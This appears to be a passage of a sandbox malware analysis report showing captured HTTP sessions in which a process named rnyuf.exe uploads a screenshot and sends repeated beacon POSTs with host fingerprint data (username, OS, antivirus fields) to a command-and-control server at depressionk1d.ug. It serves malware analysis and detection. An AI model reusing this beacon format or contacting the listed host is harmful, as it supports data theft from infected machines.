                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          330192.168.2.450157178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:22.685765982 CET15595OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:22.685866117 CET15595OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:22.686041117 CET15605OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:22.686117887 CET15608OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:22.708535910 CET15611OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:22.708578110 CET15614OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:24:22.708595991 CET15616OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:22.708627939 CET15619OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:24:22.708770990 CET15624OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:22.708807945 CET15628OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:24:22.708843946 CET15634OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:24:22.779814005 CET15705INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:22 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:24:22.786079884 CET15705OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:22.811887026 CET15705INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:22 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          331192.168.2.450158178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:22.952966928 CET15706OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:22.975950956 CET15708INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:22 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:22.975958109 CET15708INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          332192.168.2.450159178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:23.108228922 CET15709OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:23.130594969 CET15710INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:23 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:23.130636930 CET15710INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          333192.168.2.450160178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:23.263624907 CET15711OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:23.291662931 CET15711INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:23 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          334192.168.2.450161178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:23.420593023 CET15712OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:23.447393894 CET15712INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:23 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          335192.168.2.450162178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:23.596543074 CET15713OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:23.628241062 CET15713INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:23 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          336192.168.2.450163178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:23.768141985 CET15714OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:24.800326109 CET15824INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:24 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
